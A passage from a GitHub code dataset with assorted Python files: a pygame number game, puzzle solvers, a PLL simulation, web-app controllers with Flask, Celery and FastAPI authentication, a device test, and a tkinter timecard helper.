Digit_Four(x, y):\n screen.blit(fourImg, (x, y))\n\n\n# Digit Five !\nfiveImg = pygame.image.load(\"five.png\")\nfiveX = 550\nfiveY = 50\n\n\ndef Digit_Five(x, y):\n screen.blit(fiveImg, (x, y))\n\n\n# Digit Six !\nsixImg = pygame.image.load(\"six.png\")\nsixX = 150\nsixY = 120\n\n\ndef Digit_Six(x, y):\n screen.blit(sixImg, (x, y))\n\n\n# Digit seven !\nsevenImg = pygame.image.load(\"seven.png\")\nsevenX = 250\nsevenY = 120\n\n\ndef Digit_Seven(x, y):\n screen.blit(sevenImg, (x, y))\n\n\n# Digit Eight !\neightImg = pygame.image.load(\"eight.png\")\neightX = 350\neightY = 120\n\n\ndef Digit_Eight(x, y):\n screen.blit(eightImg, (x, y))\n\n\n# Digit Nine !\nnineImg = pygame.image.load(\"nine.png\")\nnineX = 450\nnineY = 120\n\n\ndef Digit_Nine(x, y):\n screen.blit(nineImg, (x, y))\n\n\ndef instructors():\n instructors_text = pygame.font.Font('OpenSans-Bold.ttf', 20)\n text = instructors_text.render(\"Input numbers using the keyboard, whoever reaches 100 wins : \", True, (0,0, 0))\n screen.blit(text, (5, 250))\n\n\n\n\n# Displaying the score_value\nscore_value = 0\nscore_text = pygame.font.Font('yankclipper2.ttf', 44)\nscoreX = 350\nscoreY = 450\n\n\ndef show_score(x, y):\n game = score_text.render(\"Current score: \" + str(score_value), True, (255, 0, 0))\n screen.blit(game, (x, y))\n\n\n# Displaying the player Turn\ncurrent_player = \"Player_One\"\nturns = pygame.font.Font('yankclipper2.ttf', 44)\nturnsX = 0\nturnsY = 350\n\n\ndef player_turn(x, y):\n turn = score_text.render(\"Current Turn: \" + str(current_player), True, (255, 0, 0))\n screen.blit(turn, (x, y))\n\n\ndef Winner():\n global Game_running\n background_new = pygame.image.load(\"Game over.jpg\")\n if current_player == \"Player_Two\" and score_value == 100:\n winner_text = pygame.font.Font('yankclipper2.ttf', 50)\n winner = winner_text.render(\"Player One Wins !! \", True, (255, 0, 0))\n screen.blit(background_new, (0, 0))\n screen.blit(winner, (275, 290))\n Game_running = False\n if current_player == \"Player_One\" and score_value == 100:\n winner_text = pygame.font.Font('yankclipper2.ttf', 50)\n winner = winner_text.render(\"Player Two Wins !! \", True, (255, 0, 0))\n screen.blit(background_new, (0, 0))\n screen.blit(winner, (275, 290))\n Game_running = False\n # Checking for Draw\n if score_value > 100:\n winner_text = pygame.font.Font('yankclipper2.ttf', 50)\n winner = winner_text.render(\"Draw!!\", True, (255, 0, 0))\n screen.blit(background_new, (0, 0))\n screen.blit(winner, (350, 290))\n Game_running = False\n\n\nwhile True:\n screen.fill((255, 255, 255))\n\n mX, mY = pygame.mouse.get_pos()\n\n # Keyboard Events !\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT: # checkinng if the user close the program\n exit()\n # Keyboard inputs !\n if Game_running == True:\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_1:\n # 1 moves to 2\n a = oneX\n b = oneY\n oneX = twoX\n oneY = twoY\n twoY = b\n twoX = a\n score_value = score_value + 1\n if current_player == \"Player_One\":\n current_player = \"Player_Two\"\n else:\n current_player = \"Player_One\"\n if event.key == pygame.K_2:\n\n # 2 moves to 6\n c = twoX\n d = twoY\n twoX = sixX\n twoY = sixY\n sixX = c\n sixY = d\n\n score_value = score_value + 2\n if current_player == \"Player_One\":\n current_player = \"Player_Two\"\n else:\n current_player = \"Player_One\"\n if event.key == pygame.K_3:\n\n # 3 moves to 7\n e = threeX\n f = threeY\n threeX = sevenX\n threeY = sevenY\n sevenX = e\n sevenY = f\n\n score_value = score_value + 3\n if current_player == \"Player_One\":\n current_player = \"Player_Two\"\n else:\n current_player = \"Player_One\"\n if event.key == pygame.K_4:\n\n # 4 moves to 9\n g = fourX\n h = fourY\n\n fourX = nineX\n fourY = nineY\n\n nineX = g\n nineY = h\n\n score_value = score_value + 4\n if current_player == \"Player_One\":\n current_player = \"Player_Two\"\n else:\n current_player = \"Player_One\"\n if event.key == pygame.K_5:\n # 5 moves to 8\n i = fiveX\n g = fiveY\n fiveX = eightX\n fiveY = eightY\n eightX = i\n eightY = g\n score_value = score_value + 5\n if current_player == \"Player_One\":\n current_player = \"Player_Two\"\n else:\n current_player = \"Player_One\"\n if event.key == pygame.K_6:\n # six moves to nine\n j = sixX\n k = sixY\n sixX = nineX\n sixY = nineY\n nineX = j\n nineY = k\n score_value = score_value + 6\n if current_player == \"Player_One\":\n current_player = \"Player_Two\"\n else:\n current_player = \"Player_One\"\n if event.key == pygame.K_7:\n # 7 moves to 4\n l = sevenX\n m = sevenY\n sevenX = fourX\n sevenY = fourY\n fourX = l\n fourY = m\n score_value = score_value + 7\n if current_player == \"Player_One\":\n current_player = \"Player_Two\"\n else:\n current_player = \"Player_One\"\n if event.key == pygame.K_8:\n # 8 moves to 1\n n = eightX\n o = eightY\n eightX = oneX\n eightY = oneY\n oneX = n\n oneY = o\n score_value = score_value + 8\n if current_player == \"Player_One\":\n current_player = \"Player_Two\"\n else:\n current_player = \"Player_One\"\n if event.key == pygame.K_9:\n # 9 moves to 5\n p = nineX\n q = nineY\n nineX = fiveX\n nineY = fiveY\n fiveX = p\n fiveY = q\n\n score_value = score_value + 9\n if current_player == \"Player_One\":\n current_player = \"Player_Two\"\n else:\n current_player = \"Player_One\"\n\n screen.blit(background, (0, 0))\n Digit_One(oneX, oneY)\n Digit_Two(twoX, twoY)\n Digit_Three(threeX, threeY)\n Digit_Four(fourX, fourY)\n Digit_Five(fiveX, fiveY)\n Digit_Six(sixX, sixY)\n Digit_Seven(sevenX, sevenY)\n Digit_Eight(eightX, eightY)\n Digit_Nine(nineX, nineY)\n show_score(scoreX, scoreY)\n player_turn(turnsX, turnsY)\n instructors()\n Winner()\n\n pygame.display.update()\n","repo_name":"OmarGaafar1/100-Game.py","sub_path":"The 100 Game/The 100 Game GUI.py","file_name":"The 100 Game GUI.py","file_ext":"py","file_size_in_byte":8722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18251791203","text":"import sys\n\ninput = sys.stdin.readline\n\nshape_one = [[1, 1, 1, 1]]\nshape_two = [[1, 1], [1, 1]]\nshape_three = [[1, 1, 1], [0, 1, 0]]\nshape_four = [[1, 0], [1, 0], [1, 1]]\nshape_five = [[1, 0], [1, 1], [0, 1]]\nshape_six = [[0, 1], [0, 1], [1, 1]]\nshape_seven = [[0, 1], [1, 1], [1, 0]]\nshapes = [shape_one, shape_two, shape_three, shape_four, shape_five, shape_six, shape_seven]\n\n\ndef brute(N: int, M: int, r: int, c: int, board: list) -> int:\n max_size = 0\n for i, shape in enumerate(shapes):\n for _ in range(4):\n size = 0\n shape = list(zip(*shape[::-1]))\n for sr in range(len(shape)):\n for sc in range(len(shape[0])):\n nr, nc = r + sr, c + sc\n if 0 <= nr < N and 0 <= nc < M:\n size += (board[nr][nc] * shape[sr][sc])\n else:\n size = 0\n break\n if size == 0:\n break\n max_size = max(size, max_size)\n\n return max_size\n\ndef solve(N: int, M: int, board: list) -> None:\n answer = 0\n for r in range(N):\n for c in range(M):\n answer = max(answer, brute(N, M, r, c, board))\n print(answer)\n\n\nif __name__ == '__main__':\n N, M = map(int, input().split())\n board = [list(map(int, input().split())) for _ in range(N)]\n solve(N, M, board)\n\n # tetrominos = [[[0, 1], [0, 2], [0, 3]],\n # [[1, 0], [2, 0], [3, 0]],\n # [[0, 1], [1, 0], [1, 1]],\n # [[1, 0], [2, 0], [2, 1]],\n # [[1, 0], [1, -1], [1, -2]],\n # [[0, 1], [1, 1], [2, 1]],\n # [[0, 1], [0, 2], [1, 0]],\n # [[1, 0], [1, 1], [2, 1]],\n # [[0, 1], [1, 0], [1, -1]],\n # [[0, 1], [0, 2], [1, 1]],\n # [[1, 0], [1, 1], [2, 0]],\n # [[1, 0], [1, -1], [1, 1]],\n # [[1, 0], [2, 0], [1, -1]],\n # ]\n\n # def brute(N: int, M: int, r: int, c: int) -> int:\n # max_size = 0\n #\n # for tetromino in tetrominos:\n # size = board[r][c]\n # for row, col in tetromino:\n # nr, nc = r + row, c + col\n # if 0 <= nr < N and 0 <= nc < M:\n # size += board[nr][nc]\n # else:\n # size = 0\n # break\n # if size:\n # max_size = max(size, max_size)\n #\n # return max_size\n","repo_name":"Just-NB/Algorithm","sub_path":"Baekjoon/구현/Gold/14500_테트로미노.py","file_name":"14500_테트로미노.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12612693047","text":"from pdf2image import convert_from_path\n\n\ndef convert_pdf_to_png(pdf_file_path, page_number, output_folder):\n images = convert_from_path(pdf_file_path, first_page=page_number + 1, last_page=page_number + 1)\n\n if images:\n image = images[0]\n output_path = f\"{output_folder}/barcode_{page_number + 1}.png\"\n image.save(output_path, \"PNG\")\n return output_path\n else:\n return None","repo_name":"Rustam0007/xim_test","sub_path":"lib/pdf2png.py","file_name":"pdf2png.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69992615847","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 5 14:06:46 2017\n\n@author: tmurphy\n\nModel of PLL displaying open loop, closed loop, and loop filter response\noutputting graphs of magnitude and phase for each.\n\nEquations taken from PLL Performance, Simulation, and Design; 5th Edition; Dean Banerjee\n\nloop filter should be correct.\nopen loop and closed loop appear accurate.\nTime response not working right?\nIs N correct?if not adjust kpd after fixing N?\nAdd phase noise plot if possible?\n\"\"\"\n\nfrom scipy import signal\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\n# CP, VCO, and Divider parameters\nkpd = 2.5e-3 # icp also\nkvco = 110e6\nn = 59.139\n\n# Fourth Order Loop filter parameters\nc1 = 1.52e-9\nc2 = 37.7e-9\nc3 = 893e-12\nc4 = 253.3e-12\nr2 = 145\nr3 = 113\nr4 = 738\n\n# Constants used in transfer function of loop filter and open loop response\na0 = c1 + c2 + c3 + c4\na1 = c2 * r2 *(c1 + c3 + c4) + r3 * (c1 + c2) * (c3 + c4) + c4 * r4 *(c1 + c2 + c3)\na2 = c1 * c2 * r2 * r3 * (c3 +c4) + c4 * r4 * (c2 * c3 * r3 + c1 * c3 * r3 + c1 * c2 * r2 + c2 * c3 * r2)\na3 = c1 * c2 * c3 * c4 * r2 * r3 * r4\nk = kpd * kvco\nt2 = r2 * c2\nt2_open = t2 * k\n\n# adjusted constants for closed loop response\ns1 = (t2 * k) / n\ns0 = k / n\n\n\ndef graph_mag(w, mag, title): # function for graphing magnitude response\n plt.figure()\n plt.semilogx(w, mag) # Bode magnitude plot\n plt.grid()\n plt.gca().xaxis.grid(True, which='minor')\n plt.title(title)\n plt.xlabel(r'Frequency (Hz)')\n plt.ylabel(r'Magnitude (db)')\n\ndef graph_phase(w, phase, title): # function for graphing phase response\n plt.figure()\n plt.semilogx(w, phase) # Bode Phase plot\n plt.grid()\n plt.gca().xaxis.grid(True, which='minor')\n plt.title(title)\n plt.xlabel(r'Frequency (Hz)')\n plt.ylabel(r'Phase (deg)')\n\ndef graph_cl(): # graph just closed loop gain response\n # Closed loop transfer response for PLL\n graph_mag(freq, mag_c, 'Closed Loop PLL Response') \n graph_phase(freq, phase_c, 'Closed Loop PLL Response')\n plt.show()\n\ndef graph_ol(): # graph just open loop gain response\n # Open loop transfer response for PLL\n graph_mag(freq, mag_o, 'Open Loop PLL Response') \n graph_phase(freq, phase_o, 'Open Loop PLL Response')\n plt.show()\n\ndef graph_lf(): # graph just open loop gain response\n # Open loop transfer response for PLL\n graph_mag(freq, mag, 'Loop Filter Response') \n graph_phase(freq, phase, 'Loop Filter Response')\n plt.show()\n\ndef graph_noise(): # graph just phase noise\n plt.figure()\n plt.semilogx(freq, vco_noise, 'b--')\n plt.semilogx(freq, ref_noise, 'g--')\n plt.semilogx(freq, s_ref, 'm')\n plt.semilogx(freq, vco_noise, 'r')\n# plt.semilogx(freq, r2_noise, 'r--')\n# plt.semilogx(freq, r3_noise, 'g--')\n# plt.semilogx(freq, r4_noise, 'b--')\n# plt.semilogx(freq, r_tot, 'm--')\n plt.grid()\n plt.ylim([-160,-60])\n plt.gca().xaxis.grid(True, which='minor')\n plt.title('Phase Noise')\n plt.xlabel(r'Frequency (Hz)')\n plt.ylabel(r'Phase Noise Power (dbc/Hz)')\n plt.show()\n\n#def r_noise(vx, tr): # equation to convert resistor noise from V to dBc/Hz\n# rout = (vx * kvco) / (freq * math.sqrt(2)) * abs(tr / [1 + mag_o/n])\n# return rout\n\n# numerators for transient response\nnum_filter = [t2, 1]\nnum_open = [t2_open, k]\nnum_closed = [s1, s0]\n\n# denominators for transient response\nden_filter = [a3, a2, a1, a0, 0]\nden_open = [a3, a2, a1, a0, 0, 0]\nden_closed = [a3, a2, a1, a0, s1, s0]\n\n# create transfer functions\nf_filter = signal.TransferFunction(num_filter, den_filter)\nf_open = signal.TransferFunction(num_open, den_open)\nf_closed = signal.TransferFunction(num_closed, den_closed)\n\n# create plot data\nfreq = np.arange (1, 100e6, 10) # frequency range 0.1Hz to 100MHz\nx_new = freq * 2 * np.pi # change frequency to rads/s for bode plot function\nw, mag, phase = signal.bode(f_filter, x_new) # loop filter creation\nw_o, mag_o, phase_o = signal.bode(f_open, x_new) # open loop creation\nw_c, mag_c, phase_c = signal.bode(f_closed, x_new) # closed loop creation\n\n\n# Phase Noise Simulation\nref_noise = np.piecewise(freq, [freq < 1, (10 > freq) & (freq >= 1), (100 > freq) & (freq >= 10), (1e3 > freq) & (freq >= 100), (1e4 > freq) & (freq >= 1e3), freq >= 1e4], [lambda x: -32 * np.log10(1241 * x), lambda x: -21 * np.log10(5.179e4 * x), lambda x: -17 * np.log10(1.145e6 * x), lambda x: -3 * np.log10(4.642e43 * x), lambda x: -5 * np.log10(1e25 * x), -145])\nvco_noise = np.piecewise(freq, [freq < 1e4, (1e5 > freq) & (freq >= 1e4), (1e6 > freq) & (freq >= 1e5), (1e7 > freq) & (freq >= 1e6), (2e7 > freq) & (freq >= 1e7), (1e8 > freq) & (freq >= 2e7), freq >= 1e8], [lambda x: -30 * np.log10(0.1166 * x), lambda x: -23 * np.log10(x), lambda x: -21 * np.log10(2.994 * x), lambda x: -20 * np.log10(6.310 * x), lambda x: -19.93 * np.log10(6.711 * x), lambda x: 42.73 * 10**(-3.862e-8 * x) - 169.2, -196])\ns_ref = 10*np.log10(mag_c)\ns_vco = vco_noise * 1/np.asarray(mag_o+1)\n\n# loop filter noise\nv2 = math.sqrt(4 * 300 * 1.380658e-23 * r2)\nv3 = math.sqrt(4 * 300 * 1.380658e-23 * r3)\nv4 = math.sqrt(4 * 300 * 1.380658e-23 * r4)\nz1 = signal.TransferFunction([c2*r2, 1], [c1*c2*r2, c1+c2, 0])\nz2 = signal.TransferFunction([c3*c4*r3*r4, (c3*r3)+(c4*r4)+(r3*c4), 1],[c3*c4*r4, c3+c4, 0])\ntmid = signal.TransferFunction(1, [c3*c4*r3*r4, (c3*r3)+(c4*r4)+(r3*c4), 1])\nvn1, carry1, zn1= signal.bode(z1, x_new)\nvn2, carry2, zn2= signal.bode(z2, x_new)\nvn3, carry3, zn3= signal.bode(tmid, x_new)\ntr2 = (carry3 * x_new * c2 * carry2) / (1 + x_new * [c2*r2 + c1*carry2 + c2*carry2] + x_new**2*c1*c2*r2*carry2)\ntr3 = (carry3*carry2)/(carry1+carry2)\ntr4 = (1 + x_new*c3*(r3+carry1)) / (1 + x_new*[(c3+c4)*(r3+carry1)+c4*r4] + x_new**2 * c3 * c4 * r4 * (r3+carry1))\nr2_noise = np.transpose(r_noise(v2, tr2))\nr3_noise = np.transpose(r_noise(v3, tr3))\nr4_noise = np.transpose(r_noise(v4, tr4))\nr_tot = 10*np.log10(10**(r2_noise/10) + 10**(r3_noise/10) + 10**(r4_noise/10))\n\n\n\n\n\n\n\n\n","repo_name":"jsochacki/simpyle_systems","sub_path":"linear_systems/PLL_Simulation.py","file_name":"PLL_Simulation.py","file_ext":"py","file_size_in_byte":6022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25039632725","text":"from blacksheep import RoutesRegistry\nfrom blacksheep.server.openapi.v3 import OpenAPIHandler\n\nfrom app.settings import Settings\nfrom app.core.common.mediator import Mediator\nfrom .base import BaseController\nfrom .info import InfoController\nfrom .auth import AuthController\nfrom .users import UsersController\nfrom .grounds import GroundsController\nfrom .exc_handlers import ( # noqa\n validation_error_handler,\n auth_error_handler,\n)\n\n\ndef setup(\n route_registry: RoutesRegistry,\n settings: Settings,\n docs: OpenAPIHandler,\n mediator: Mediator,\n) -> None:\n\n controllers: list[BaseController] = [\n InfoController(\n router=route_registry,\n settings=settings,\n docs=docs,\n mediator=mediator,\n ),\n AuthController(\n router=route_registry,\n settings=settings,\n docs=docs,\n mediator=mediator,\n ),\n UsersController(\n router=route_registry,\n settings=settings,\n docs=docs,\n mediator=mediator,\n ),\n GroundsController(\n router=route_registry,\n settings=settings,\n docs=docs,\n mediator=mediator,\n ),\n ]\n for controller in controllers:\n controller.register()\n","repo_name":"neekrasov/workout_helper","sub_path":"app/presentation/api/controllers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"34107477392","text":"\"\"\"\nФайл содержит скрипты представл��ний\n\"\"\"\nimport os\n\nfrom app import flask_app\nfrom flask import request, render_template, url_for, jsonify\nfrom werkzeug.utils import secure_filename\n\nfrom app.celery_run import celery_app\nfrom app.tasks import upload_from_link, upload_from_disk\nimport uuid\n\n\n@flask_app.route('/', methods=['GET'])\ndef index():\n \"\"\"\n Представление главной страницы\n\n :return: Главная страница с формой для загрузки файла\n \"\"\"\n if request.method == 'GET':\n return render_template('index.html')\n\n\n@flask_app.route('/uploadfile', methods=['POST'])\ndef uploadfile():\n \"\"\"\n Представление для начала загрузки файла. При нажатии на кнопку на главной странице\n отправляется запрос на данное представление. В зависимости от того, ввёл пользователь ссылку на файл\n или выбрал файл для загрузки в очередь Сelery добавляется соответствующая задача.\n\n :return: Возвращает статус 202 успешном добавлении задач в очередь\n \"\"\"\n\n file = request.files['file']\n # Если в форме нет файл, то запускается скачивание по ссылке\n if not file.filename:\n task = upload_from_link.delay(request.form['url_text'])\n else:\n\n filename = secure_filename(file.filename)\n # Сохранение файла на диск\n file_path = os.path.join(flask_app.config['UPLOAD_FOLDER'], filename + str(uuid.uuid4()))\n file.save(file_path)\n file.close()\n task = upload_from_disk.delay(file_path)\n return jsonify({}), 202, {'Location': url_for('taskstatus',\n task_id=task.id),\n 'err_message': ''}\n\n\n@flask_app.route('/status/')\ndef taskstatus(task_id):\n \"\"\"\n Представление по task_id определяет статус задачи и возвращает информацию о его состоянии\n\n :param guid task_id: Идентификатор задачи в celery.\n :return: JSON объект, содержащий информация о состоянии задачи\n \"\"\"\n task = celery_app.AsyncResult(task_id)\n # Задача в очереди\n if task.state == 'PENDING':\n response = {\n 'state': task.state,\n 'current': 0.5,\n 'total': 1,\n 'status': 'В очереди'\n }\n # Задача выполняется и из неё можно получить данные о процессе выполнения\n elif task.state != 'FAILURE':\n response = {\n 'state': task.state,\n 'current': task.info.get('current', 0),\n 'total': task.info.get('total', 1),\n 'status': task.info.get('status', '')\n }\n if 'result' in task.info:\n response['result'] = task.info['result']\n # Скрипт выполнения задачи вызвал исключение\n else:\n response = {\n 'state': task.state,\n 'current': 1,\n 'total': 1,\n 'status': str(task.info),\n }\n return jsonify(response)\n","repo_name":"kolotilko/csv_upload","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5540113096","text":"# XOR decryption\n\nfrom statistics import mode\n\n\ntext = open('Solved/59.txt').read()\ncharacters = text.split(',')\n\ncommons = \" ea\"\nmode0 = int(mode([characters[i] for i in range(len(characters)) if i % 3 == 0]))\nmode1 = int(mode([characters[i] for i in range(len(characters)) if i % 3 == 1]))\nmode2 = int(mode([characters[i] for i in range(len(characters)) if i % 3 == 2]))\n\nkeys = []\nfor common0 in commons:\n for common1 in commons:\n for common2 in commons:\n char0 = chr(ord(common0) ^ mode0)\n char1 = chr(ord(common1) ^ mode1)\n char2 = chr(ord(common2) ^ mode2)\n keys.append(char0 + char1 + char2)\n\nfor key in keys:\n a = key[0]\n b = key[1]\n c = key[2]\n decrypt = ''\n bad = False\n for i in range(len(characters)):\n if i % 3 == 0:\n x = ord(a)\n elif i % 3 == 1:\n x = ord(b)\n else:\n x = ord(c)\n n = int(characters[i]) ^ x\n if 128 > n > 31:\n decrypt += chr(n)\n else:\n bad = True\n break\n if not bad:\n print(a+b+c+\":\", decrypt)\n print(sum(ord(char) for char in decrypt))\n print()\n","repo_name":"altith01/ProjectEuler","sub_path":"Solved/59.py","file_name":"59.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36088815718","text":"import time\n\nimport epics\n\nfrom haven.instrument.energy_positioner import EnergyPositioner\n\n\ndef test_pseudo_to_real_positioner(ioc_mono, ioc_undulator):\n positioner = EnergyPositioner(\n name=\"energy\",\n mono_pv=ioc_mono.pvs[\"energy\"],\n id_prefix=ioc_undulator.prefix.strip(\":\"),\n id_tracking_pv=ioc_mono.pvs[\"id_tracking\"],\n id_offset_pv=ioc_mono.pvs[\"id_offset\"],\n )\n positioner.mono_energy.wait_for_connection()\n positioner.id_energy.wait_for_connection()\n positioner.energy.set(10000, timeout=5.0)\n assert positioner.get(use_monitor=False).mono_energy.user_setpoint == 10000\n positioner.id_offset.set(230)\n time.sleep(0.1)\n # Move the energy positioner\n positioner.energy.set(5000)\n time.sleep(0.1) # Caproto breaks pseudopositioner status\n # Check that the mono and ID are both moved\n assert positioner.get(use_monitor=False).mono_energy.user_setpoint == 5000\n expected_id_energy = 5.0 + positioner.id_offset.get(use_monitor=False) / 1000\n assert positioner.get(use_monitor=False).id_energy.setpoint == expected_id_energy\n\n\ndef test_real_to_pseudo_positioner(ioc_mono, ioc_undulator):\n positioner = EnergyPositioner(\n name=\"energy\",\n mono_pv=ioc_mono.pvs[\"energy\"],\n id_prefix=ioc_undulator.prefix.strip(\":\"),\n id_tracking_pv=ioc_mono.pvs[\"id_tracking\"],\n id_offset_pv=ioc_mono.pvs[\"id_offset\"],\n )\n positioner.wait_for_connection(timeout=10.0)\n # Move the mono energy positioner\n epics.caput(ioc_mono.pvs[\"energy\"], 5000.0)\n time.sleep(0.1) # Caproto breaks pseudopositioner status\n assert epics.caget(ioc_mono.pvs[\"energy\"], use_monitor=False) == 5000.0\n # assert epics.caget(\"mono_ioc:Energy.RBV\") == 5000.0\n # Check that the pseudo single is updated\n assert positioner.energy.get(use_monitor=False).readback == 5000.0\n","repo_name":"spc-group/haven","sub_path":"tests/test_energy_positioner.py","file_name":"test_energy_positioner.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"70615828692","text":"from typing import Optional\n\nfrom fastapi import Depends, HTTPException\nfrom fastapi.security import OAuth2PasswordBearer\nfrom jose import jwt\nfrom pydantic import ValidationError\nfrom sqlalchemy.ext.asyncio import AsyncSession as Session\n\nfrom app import database, model\nfrom app.core import security\nfrom app.core.config import configs\nfrom .db import get_db\n\nreusable_oauth2 = OAuth2PasswordBearer(tokenUrl=f\"{configs.API_V1_STR}/login/token\")\n\n# Define various access restrictions we can Depends() on later\n# Authenticated user\nasync def get_current_user(\n db: Session = Depends(get_db), token: str = Depends(reusable_oauth2)\n) -> database.User:\n try:\n payload = jwt.decode(token, configs.SECRET_KEY, algorithms=[security.ALGORITHM])\n token_data = model.TokenPayload(**payload)\n if not token_data.sub:\n raise jwt.JWTError\n except (jwt.JWTError, ValidationError):\n raise HTTPException(status_code=401, detail=\"Must be authenticated\")\n user = await database.user.get(db, id=token_data.sub)\n if not user:\n raise HTTPException(\n status_code=400, detail=\"Token does not point to a valid user\"\n )\n return user\n\n\n# Admin user\ndef get_admin_user(\n db: Session = Depends(get_db), user: database.User = Depends(get_current_user)\n) -> database.User:\n if not database.user.is_admin(db, user=user):\n raise HTTPException(\n status_code=403,\n detail=\"User does not have the required privileges to access this resource\",\n )\n return user\n\n\nclass Permission:\n permission: Optional[str]\n\n def __init__(self, permission: Optional[str] = None):\n self.permission = permission\n\n def __call__(self, user: database.User = Depends(get_current_user)):\n if not user:\n raise HTTPException(status_code=401, detail=\"Not authenticated\")\n if self.permission == \"admin\" and not user.is_admin:\n raise HTTPException(\n status_code=403,\n detail=\"User does not have the required privileges to access this resource\",\n )\n return user\n","repo_name":"accelleon/cloudmgmt","sub_path":"backend/app/app/api/core/security.py","file_name":"security.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15952581381","text":"# https://leetcode.com/problems/complete-binary-tree-inserter\n\n# https://leetcode.com/problems/complete-binary-tree-inserter/solution\n\n\nfrom TreeNode import TreeNode\n\n# runtime; 720ms, 7.01%\n# memory; 13.2MB, 100.00%\nclass CBTInserter:\n\n def __init__(self, root):\n self.root = root\n\n def insert(self, v):\n q = [self.root]\n while q:\n node = q.pop(0)\n if node.left is None:\n node.left = TreeNode(v)\n return node.val\n elif node.right is None:\n node.right = TreeNode(v)\n return node.val\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n return 0\n\n def get_root(self):\n return self.root\n\n\nc = CBTInserter(TreeNode(1))\nprint(c.insert(2))\nprint(c.get_root())\n\nroot = TreeNode(1)\nroot.left = TreeNode(2)\nroot.right = TreeNode(3)\nroot.left.left = TreeNode(4)\nroot.left.right = TreeNode(5)\nroot.right.left = TreeNode(6)\nc = CBTInserter(root)\nprint(c.insert(7))\nprint(c.insert(8))\nprint(c.get_root())\n","repo_name":"hyunjun/practice","sub_path":"python/problem-tree/complete_binary_tree_inserter.py","file_name":"complete_binary_tree_inserter.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"22694334636","text":"import tkinter as tk\nimport timecard_helper as th\nimport datetime\n\n\ndef switch_time_left():\n \"\"\"\n Switch to the Time Left screen.\n \"\"\"\n time_left_frame.pack()\n time_left(time_left_frame)\n menu_frame.forget()\n\n\ndef switch_convert():\n \"\"\"\n Switch to the Convert screen\n \"\"\"\n convert_frame.pack()\n converter(convert_frame)\n menu_frame.forget()\n\n\ndef switch_scheduler():\n \"\"\"\n Switch to the Scheduler screen\n \"\"\"\n scheduler_frame.pack()\n scheduler(scheduler_frame)\n menu_frame.forget()\n\n\ndef switch_time_difference():\n \"\"\"\n Switch to the Time Difference screen\n \"\"\"\n time_difference_frame.pack(fill='x')\n time_difference(time_difference_frame)\n menu_frame.forget()\n\n\ndef switch_sr():\n \"\"\"\n Switch to the Scheduler screen for Thursday.\n \"\"\"\n sr_frame.pack()\n sr(sr_frame)\n scheduler_frame.forget()\n\n\ndef switch_sf():\n \"\"\"\n Switch for the Scheduler screen for Friday.\n \"\"\"\n sf_frame.pack()\n sf(sf_frame)\n scheduler_frame.forget()\n\n\ndef time_left(frame):\n \"\"\"\n Calculates the time left to work, given how many hours have been already worked.\n Assumes 40 hours a week.\n \"\"\"\n txt = tk.Message(frame, text=\"Calculate time left to work\", width=300)\n total_hours = 40.00\n\n def enter_click():\n this_week = float(hours.get())\n remaining = total_hours - this_week\n string = \"Hours left to work: \" + str(remaining)\n msg = tk.Message(frame, text=string, width=300)\n msg.pack()\n\n hours = tk.StringVar()\n textbox = tk.Entry(frame, textvariable=hours)\n ent = tk.Button(frame, text=\"Enter\", command=enter_click)\n\n txt.pack(side=tk.TOP)\n textbox.pack()\n ent.pack()\n\n\ndef converter(frame):\n \"\"\"\n The screen for converting minutes from a decimal.\n \"\"\"\n txt = tk.Message(frame, text=\"Calculate minutes from decimal\", width=300)\n\n def enter_click():\n time = float(entry.get())\n converted = th.convert_helper(time, 1)\n string = \"This is equivalent to \" + str(converted)\n msg = tk.Message(frame, text=string, width=300)\n msg.pack()\n\n entry = tk.StringVar()\n textbox = tk.Entry(frame, textvariable=entry)\n ent = tk.Button(frame, text=\"Enter\", command=enter_click)\n\n txt.pack(side=tk.TOP)\n textbox.pack()\n ent.pack()\n\n\ndef scheduler(frame):\n \"\"\"\n The starting screen for the Scheduler.\n \"\"\"\n txt1 = tk.Message(frame, text=\"Schedule the rest of the week\", width=300)\n txt2 = tk.Message(frame, text=\"Which day would you like to schedule?\", width=300)\n\n r_button = tk.Button(frame, text=\"Thursday\", command=switch_sr)\n f_button = tk.Button(frame, text=\"Friday\", command=switch_sf)\n\n txt1.pack(side=tk.TOP)\n txt2.pack(side=tk.TOP)\n r_button.pack(side=tk.LEFT)\n f_button.pack(side=tk.RIGHT)\n\n\ndef sr(frame):\n \"\"\"\n The scheduling screen for Thursday.\n \"\"\"\n txt1 = tk.Message(frame, text=\"How many hours have you worked so far?\", width=300)\n txt2 = tk.Message(frame, text=\"What time did you check in? (HH:MM) \", width=300)\n txt3 = tk.Message(frame, text=\"What time do you have to start on Friday? (HH:MM) \", width=300)\n var1 = tk.StringVar()\n var2 = tk.StringVar()\n var3 = tk.StringVar()\n\n def enter_click():\n sum = float(var1.get())\n checkin = var2.get()\n fri_start = var3.get()\n sum_format = 